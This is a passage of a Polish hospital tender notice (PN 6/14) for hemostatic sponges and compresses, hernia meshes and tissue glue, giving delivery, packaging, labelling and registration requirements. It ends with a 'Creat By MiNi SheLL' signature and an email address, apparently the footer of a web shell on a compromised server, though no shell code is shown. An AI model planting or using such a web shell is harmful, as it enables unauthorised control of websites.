Wszystkie przedmioty zamówienia muszą być dopuszczone do obrotu na rynku polskim,zgodnie z przepisami prawa i posiadać odpowiednie dokumenty rejestracyjne potwierdzające ten fakt.
Zaoferowany przez Wykonawcę przedmiot zamówienia w zakresie opakowań, oznaczenia oraz obrotu odpowiadają wymaganiom ustawy o wyrobach medycznych z dn. 20 maja 2010r. (Dz.U. Z 2010r. Nr 107 poz 679.
Zamówienie wykonywane będzie w okresach kolejnych 12 miesięcy.

Oferowane przedmioty zamówienia muszą być dopuszczone do obrotu na terenie RP i UE.

Data ważności i numer serii musi być oznaczona na opakowaniu każdego przedmiotu zamówienia 
Data ważności i numer serii muszą być naniesione na fakturę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PN  6/14  - przetarg na dostawę materiałów szewnych -zadanie nr 3-gąbki hemostatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy materiałów szewnych  - zgodnie z zestawieniem  - załącznik nr 1c
   

Dostarczane  przedmioty zamowienia    muszą   posiadać w  momencie  dostarczenia do apteki szpitala   minimum 12 miesięczny okres  przydatności  do użycia.  Wykonawca dostarczy przedmiot zamówienia do  magazynu  Apteki ( budynek C). Termin dostawy przedmiotów zamówienia - wg bieżących potrzeb, każdorazowo w ciągu max 72 godzin od daty złożenia zamówienia.
Zamawiający wymaga aby:
  1) Nici były pakowane w sterylne, podwójnie szczelnie zamknięte saszetki - folia - papier i folia aluminiowa, gąbka  hemostatyczna w opakowaniu sterylnym
    2) Saszetki nici były opisane co do rodzaju nici w języku polskim
   3) Wymaga się w celu sprawdzenia spełnienia wymogów SIWZ - katalogu w języku polskim z opisem rodzaju proponowanych szwów oraz opisem graficznym igieł.
   4) Data ważności i seria na fakturze, faktura na nośniku magnetycznym (dyskietka, CD, pendrive) lub na adres e-mailowy kierownika Apteki, który zostanie podany na zyczenie Wykonawcy ktory uzyska zamówienie, po zakończonej procedurze przetargowej.
  5) Termin przydatności towaru do użytku nie może być krótszy niż 12 
 6) Wymaga się igieł silikonizowanych a na potwierdzenie powyższego - deklaracji producenta o powleczeniu

Zamawiający zastrzega sobie mozliwość wezwania Oferenta w razie wątpliwości, że zaoferowany produkt nie spełnia wymogów SIWZ, do dostarczenia bezzwrotnych próbek po 1 saszetce



Próbki przekazane do testowania muszą być opakowane w jednostkowe opakowania handlowe zawierające informacje wymagane przepisami rozporządzenia w sprawie wymagań zasadniczych do wyrobów medycznych do różnego przeznaczenia.
W przypadku jednostkowego opakowania, do każdej  próbki należy dołączyć kserokopię etykiety znajdującej się na opakowaniu handlowym. Każda próbka opatrzona będzie etykietą zawierającą wszystkie dane zaoferowanego produktu, opis w j. polskim.

Wszystkie przedmioty zamówienia muszą być dopuszczone do obrotu na rynku polskim,zgodnie z przepisami prawa i posiadać odpowiednie dokumenty rejestracyjne potwierdzające ten fakt.
Zaoferowany przez Wykonawcę przedmiot zamówienia w zakresie opakowań, oznaczenia oraz obrotu odpowiadają wymaganiom ustawy o wyrobach medycznych z dn. 20 maja 2010r. (Dz.U. Z 2010r. Nr 107 poz 679.
Zamówienie wykonywane będzie w okresach kolejnych 12 miesięcy.

Oferowane przedmioty zamówienia muszą być dopuszczone do obrotu na terenie RP i UE.

Data ważności i numer serii musi być oznaczona na opakowaniu każdego przedmiotu zamówienia 
Data ważności i numer serii muszą być naniesione na fakturę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PN  6/14  - przetarg na dostawę materiałów szewnych -zadanie nr 4-kompresy hemostatyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy materiałów szewnych  - zgodnie z zestawieniem  - załącznik nr 1d
   

Dostarczane  przedmioty zamowienia    muszą   posiadać w  momencie  dostarczenia do apteki szpitala   minimum 12 miesięczny okres  przydatności  do użycia.  Wykonawca dostarczy przedmiot zamówienia do  magazynu  Apteki ( budynek C). Termin dostawy przedmiotów zamówienia - wg bieżących potrzeb, każdorazowo w ciągu max 72 godzin od daty złożenia zamówienia.
Zamawiający wymaga aby:
  1) Nici były pakowane w sterylne, podwójnie szczelnie zamknięte saszetki - folia - papier i folia aluminiowa, gąbka  hemostatyczna w opakowaniu sterylnym
    2) Saszetki nici były opisane co do rodzaju nici w języku polskim
   3) Wymaga się w celu sprawdzenia spełnienia wymogów SIWZ - katalogu w języku polskim z opisem rodzaju proponowanych szwów oraz opisem graficznym igieł.
   4) Data ważności i seria na fakturze, faktura na nośniku magnetycznym (dyskietka, CD, pendrive) lub na adres e-mailowy kierownika Apteki, który zostanie podany na zyczenie Wykonawcy ktory uzyska zamówienie, po zakończonej procedurze przetargowej.
  5) Termin przydatności towaru do użytku nie może być krótszy niż 12 
 6) Wymaga się igieł silikonizowanych a na potwierdzenie powyższego - deklaracji producenta o powleczeniu

Zamawiający zastrzega sobie mozliwość wezwania Oferenta w razie wątpliwości, że zaoferowany produkt nie spełnia wymogów SIWZ, do dostarczenia bezzwrotnych próbek po 1 saszetce



Próbki przekazane do testowania muszą być opakowane w jednostkowe opakowania handlowe zawierające informacje wymagane przepisami rozporządzenia w sprawie wymagań zasadniczych do wyrobów medycznych do różnego przeznaczenia.
W przypadku jednostkowego opakowania, do każdej  próbki należy dołączyć kserokopię etykiety znajdującej się na opakowaniu handlowym. Każda próbka opatrzona będzie etykietą zawierającą wszystkie dane zaoferowanego produktu, opis w j. polskim.

Wszystkie przedmioty zamówienia muszą być dopuszczone do obrotu na rynku polskim,zgodnie z przepisami prawa i posiadać odpowiednie dokumenty rejestracyjne potwierdzające ten fakt.
Zaoferowany przez Wykonawcę przedmiot zamówienia w zakresie opakowań, oznaczenia oraz obrotu odpowiadają wymaganiom ustawy o wyrobach medycznych z dn. 20 maja 2010r. (Dz.U. Z 2010r. Nr 107 poz 679.
Zamówienie wykonywane będzie w okresach kolejnych 12 miesięcy.

Oferowane przedmioty zamówienia muszą być dopuszczone do obrotu na terenie RP i UE.

Data ważności i numer serii musi być oznaczona na opakowaniu każdego przedmiotu zamówienia 
Data ważności i numer serii muszą być naniesione na fakturę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PN  6/14  - przetarg na dostawę materiałów szewnych -zadanie nr 5-siatki przepuklinowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy materiałów szewnych  - zgodnie z zestawieniem  - załącznik nr 1e
   

Dostarczane  przedmioty zamowienia    muszą   posiadać w  momencie  dostarczenia do apteki szpitala   minimum 12 miesięczny okres  przydatności  do użycia.  Wykonawca dostarczy przedmiot zamówienia do  magazynu  Apteki ( budynek C). Termin dostawy przedmiotów zamówienia - wg bieżących potrzeb, każdorazowo w ciągu max 72 godzin od daty złożenia zamówienia.
Zamawiający wymaga aby:
  1) Nici były pakowane w sterylne, podwójnie szczelnie zamknięte saszetki - folia - papier i folia aluminiowa, gąbka  hemostatyczna w opakowaniu sterylnym
    2) Saszetki nici były opisane co do rodzaju nici w języku polskim
   3) Wymaga się w celu sprawdzenia spełnienia wymogów SIWZ - katalogu w języku polskim z opisem rodzaju proponowanych szwów oraz opisem graficznym igieł.
   4) Data ważności i seria na fakturze, faktura na nośniku magnetycznym (dyskietka, CD, pendrive) lub na adres e-mailowy kierownika Apteki, który zostanie podany na zyczenie Wykonawcy ktory uzyska zamówienie, po zakończonej procedurze przetargowej.
  5) Termin przydatności towaru do użytku nie może być krótszy niż 12 
 6) Wymaga się igieł silikonizowanych a na potwierdzenie powyższego - deklaracji producenta o powleczeniu

Zamawiający zastrzega sobie mozliwość wezwania Oferenta w razie wątpliwości, że zaoferowany produkt nie spełnia wymogów SIWZ, do dostarczenia bezzwrotnych próbek po 1 saszetce



Próbki przekazane do testowania muszą być opakowane w jednostkowe opakowania handlowe zawierające informacje wymagane przepisami rozporządzenia w sprawie wymagań zasadniczych do wyrobów medycznych do różnego przeznaczenia.
W przypadku jednostkowego opakowania, do każdej  próbki należy dołączyć kserokopię etykiety znajdującej się na opakowaniu handlowym. Każda próbka opatrzona będzie etykietą zawierającą wszystkie dane zaoferowanego produktu, opis w j. polskim.

Wszystkie przedmioty zamówienia muszą być dopuszczone do obrotu na rynku polskim,zgodnie z przepisami prawa i posiadać odpowiednie dokumenty rejestracyjne potwierdzające ten fakt.
Zaoferowany przez Wykonawcę przedmiot zamówienia w zakresie opakowań, oznaczenia oraz obrotu odpowiadają wymaganiom ustawy o wyrobach medycznych z dn. 20 maja 2010r. (Dz.U. Z 2010r. Nr 107 poz 679.
Zamówienie wykonywane będzie w okresach kolejnych 12 miesięcy.

Oferowane przedmioty zamówienia muszą być dopuszczone do obrotu na terenie RP i UE.

Data ważności i numer serii musi być oznaczona na opakowaniu każdego przedmiotu zamówienia 
Data ważności i numer serii muszą być naniesione na fakturę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PN  6/14  - przetarg na dostawę materiałów szewnych -zadanie nr 6-klej tkankowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy materiałów szewnych  - zgodnie z zestawieniem  - załącznik nr 1f
   

Dostarczane  przedmioty zamowienia    muszą   posiadać w  momencie  dostarczenia do apteki szpitala   minimum 12 miesięczny okres  przydatności  do użycia.  Wykonawca dostarczy przedmiot zamówienia do  magazynu  Apteki ( budynek C). Termin dostawy przedmiotów zamówienia - wg bieżących potrzeb, każdorazowo w ciągu max 72 godzin od daty złożenia zamówienia.
Zamawiający wymaga aby:
  1) Nici były pakowane w sterylne, podwójnie szczelnie zamknięte saszetki - folia - papier i folia aluminiowa, gąbka  hemostatyczna w opakowaniu sterylnym
    2) Saszetki nici były opisane co do rodzaju nici w języku polskim
   3) Wymaga się w celu sprawdzenia spełnienia wymogów SIWZ - katalogu w języku polskim z opisem rodzaju proponowanych szwów oraz opisem graficznym igieł.
   4) Data ważności i seria na fakturze, faktura na nośniku magnetycznym (dyskietka, CD, pendrive) lub na adres e-mailowy kierownika Apteki, który zostanie podany na zyczenie Wykonawcy ktory uzyska zamówienie, po zakończonej procedurze przetargowej.
  5) Termin przydatności towaru do użytku nie może być krótszy niż 12 
 6) Wymaga się igieł silikonizowanych a na potwierdzenie powyższego - deklaracji producenta o powleczeniu

Zamawiający zastrzega sobie mozliwość wezwania Oferenta w razie wątpliwości, że zaoferowany produkt nie spełnia wymogów SIWZ, do dostarczenia bezzwrotnych próbek po 1 saszetce



Próbki przekazane do testowania muszą być opakowane w jednostkowe opakowania handlowe zawierające informacje wymagane przepisami rozporządzenia w sprawie wymagań zasadniczych do wyrobów medycznych do różnego przeznaczenia.
W przypadku jednostkowego opakowania, do każdej  próbki należy dołączyć kserokopię etykiety znajdującej się na opakowaniu handlowym. Każda próbka opatrzona będzie etykietą zawierającą wszystkie dane zaoferowanego produktu, opis w j. polskim.

Wszystkie przedmioty zamówienia muszą być dopuszczone do obrotu na rynku polskim,zgodnie z przepisami prawa i posiadać odpowiednie dokumenty rejestracyjne potwierdzające ten fakt.
Zaoferowany przez Wykonawcę przedmiot zamówienia w zakresie opakowań, oznaczenia oraz obrotu odpowiadają wymaganiom ustawy o wyrobach medycznych z dn. 20 maja 2010r. (Dz.U. Z 2010r. Nr 107 poz 679.
Zamówienie wykonywane będzie w okresach kolejnych 12 miesięcy.

Oferowane przedmioty zamówienia muszą być dopuszczone do obrotu na terenie RP i UE.

Data ważności i numer serii musi być oznaczona na opakowaniu każdego przedmiotu zamówienia 
Data ważności i numer serii muszą być naniesione na fakturę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.25-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com